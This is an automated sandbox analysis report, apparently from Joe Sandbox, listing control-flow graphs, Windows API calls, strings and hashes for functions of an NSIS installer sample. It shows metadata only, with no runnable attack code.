                                                                                                                                                                                                                                                                                      • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                                      Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                      • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                      • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                      • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                      • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                                      Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,004279E0,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                      • String ID: (]C$... %d%%$pAB$yB
                                                                                                                                                                                                                                                                                      • API String ID: 651206458-3882596388
                                                                                                                                                                                                                                                                                      • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                      • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                                      Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00445D80,004279E0,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                      • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                                      Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                      • String ID: <RM>$KsUtilizeBuildings$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                      • API String ID: 247603264-611231991
                                                                                                                                                                                                                                                                                      • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                      • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                      Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004279E0,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                      • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                      • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                      • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                      Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                      • String ID: nsa
                                                                                                                                                                                                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                      • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                      • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                      Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: HideWindow
                                                                                                                                                                                                                                                                                      • API String ID: 1249568736-780306582
